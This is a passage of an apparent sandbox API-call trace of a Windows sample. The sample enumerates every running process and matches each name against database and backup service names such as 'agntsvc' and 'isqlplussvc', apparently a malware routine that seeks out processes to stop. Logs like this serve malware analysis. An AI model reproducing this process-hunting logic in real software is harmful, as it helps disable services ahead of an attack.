out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0093.471] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0093.471] StrStrIA (lpFirst="taskhostw.exe", lpSrch="agntsvc") returned 0x0 [0093.471] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0093.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.473] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3568f88 [0093.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3568f88, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0093.473] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0093.473] StrStrIA (lpFirst="UsoClient.exe", lpSrch="agntsvc") returned 0x0 [0093.473] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0093.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.474] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3568fa0 [0093.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3568fa0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0093.474] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0093.474] StrStrIA (lpFirst="taskhostw.exe", lpSrch="agntsvc") returned 0x0 [0093.474] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0093.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0093.475] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3566ed0 [0093.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3566ed0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0093.475] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0093.475] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="agntsvc") returned 0x0 [0093.475] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0093.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.476] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3566f90 [0093.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3566f90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0093.476] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0093.476] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="agntsvc") returned 0x0 [0093.476] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0093.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.477] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x35669f8 [0093.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x35669f8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0093.478] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0093.478] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="agntsvc") returned 0x0 [0093.478] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.479] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568fd0 [0093.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3568fd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.479] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0093.479] StrStrIA (lpFirst="conhost.exe", lpSrch="agntsvc") returned 0x0 [0093.479] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.480] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569240 [0093.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3569240, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.480] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0093.480] StrStrIA (lpFirst="conhost.exe", lpSrch="agntsvc") returned 0x0 [0093.480] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.481] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569078 [0093.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569078, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.481] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.481] StrStrIA (lpFirst="svchost.exe", lpSrch="agntsvc") returned 0x0 [0093.481] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0093.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.482] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3569030 [0093.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3569030, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0093.482] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0093.482] StrStrIA (lpFirst="rxodge.exe", lpSrch="agntsvc") returned 0x0 [0093.482] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0093.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.483] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3569150 [0093.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3569150, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0093.483] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0093.483] StrStrIA (lpFirst="sppsvc.exe", lpSrch="agntsvc") returned 0x0 [0093.483] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0093.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.484] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3566e30 [0093.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3566e30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0093.484] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0093.484] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="agntsvc") returned 0x0 [0093.484] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0093.485] CloseHandle (hObject=0x350) returned 1 [0093.485] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0093.500] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.501] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3566fd0 [0093.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3566fd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0093.501] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0093.501] StrStrIA (lpFirst="[System Process]", lpSrch="isqlplussvc") returned 0x0 [0093.501] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0093.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0093.532] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3547a68 [0093.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3547a68, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0093.532] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0093.532] StrStrIA (lpFirst="System", lpSrch="isqlplussvc") returned 0x0 [0093.532] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0093.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.534] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35692b8 [0093.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x35692b8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0093.534] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0093.534] StrStrIA (lpFirst="smss.exe", lpSrch="isqlplussvc") returned 0x0 [0093.534] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.535] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3569228 [0093.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3569228, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0093.535] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0093.535] StrStrIA (lpFirst="csrss.exe", lpSrch="isqlplussvc") returned 0x0 [0093.535] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0093.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.536] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569288 [0093.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3569288, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0093.537] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0093.537] StrStrIA (lpFirst="wininit.exe", lpSrch="isqlplussvc") returned 0x0 [0093.537] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.538] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35692d0 [0093.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35692d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0093.538] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0093.538] StrStrIA (lpFirst="csrss.exe", lpSrch="isqlplussvc") returned 0x0 [0093.538] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0093.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.539] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35692e8 [0093.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x35692e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0093.539] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0093.539] StrStrIA (lpFirst="winlogon.exe", lpSrch="isqlplussvc") returned 0x0 [0093.539] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0093.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.540] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3569180 [0093.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3569180, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0093.541] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0093.541] StrStrIA (lpFirst="services.exe", lpSrch="isqlplussvc") returned 0x0 [0093.541] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0093.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.542] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3569090 [0093.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3569090, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0093.542] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0093.542] StrStrIA (lpFirst="lsass.exe", lpSrch="isqlplussvc") returned 0x0 [0093.542] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.543] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35691b0 [0093.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35691b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0093.543] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0093.543] StrStrIA (lpFirst="svchost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.543] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0093.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.544] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35692a0 [0093.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35692a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0093.544] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0093.544] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="isqlplussvc") returned 0x0 [0093.544] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0093.545] 